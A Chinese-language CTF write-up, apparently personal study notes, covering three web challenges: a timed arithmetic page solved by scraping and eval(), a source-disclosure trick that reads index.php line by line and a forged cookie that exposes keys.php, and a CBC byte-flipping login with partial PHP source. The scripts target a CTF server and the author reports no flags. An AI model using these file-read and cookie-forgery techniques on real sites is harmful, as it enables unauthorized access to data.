秋名山老司机
下面的表达式的值是秋名山的车速
亲请在2s内计算老司机的车速是多少
1782911879+706686703-1996813020-984998196*1213520247-1805071043*379299795+1623596400-1052850963+2102818407-2101949215=?;
两秒之内计算出式子中的值, 再提交
菜鸡还不太会写脚本
参考了dalao们的代码
import requests
import re
url = 'http://120.24.86.145:8002/qiumingshan/'
s = requests.Session()
source = s.get(url)
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
result = eval(expression)
post = {'value': result}
print(s.post(url, data = post).text)
不过还是没搞出来。
复习一下requests
库
import requests
#构造requests对象
s = requests.get(url)
s.post(url, )
#差不多就这些了
cookies欺骗
然而注意到URL中的line和file时就能做出来了。
#用脚本把代码跑出来
import requests
a=30
for i in range(a):
url="http://120.24.86.145:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
s=requests.get(url)
print s.text
'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ //看这里
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
构造cookie就行啦
(然而没搞出flag来)
login4
CBC字节翻转攻击
放一张经典的图
据师傅们的wp说是有一个index.php.swp文件存在。
然而没找到, 先把师傅们找到的源码放上来
base64_decode('".base64_encode($plain)."') can't unserialize");
$_SESSION['username'] = $info['username'];
}else{
die("ERROR!");
}
}
}
function show_homepage(){
if ($_SESSION["username"]==='admin'){
echo 'Hello admin
';
echo 'Flag is $flag
';
}else{
echo 'hello '.$_SESSION['username'].'
';
echo 'Only admin can see flag
';
}
echo '';
}
if(isset($_POST['username']) && isset($_POST['password'])){
$username = (string)$_POST['username'];
$password = (string)$_POST['password'];
if($username === 'admin'){
exit('admin are not allowed to login
');
}else{
$info = array('username'=>$username,'password'=>$password);
login($info);
show_homepage();
}
}else{
if(isset($_SESSION["username"])){
check_login();
show_homepage();
}else{
echo '
';
}
}
?>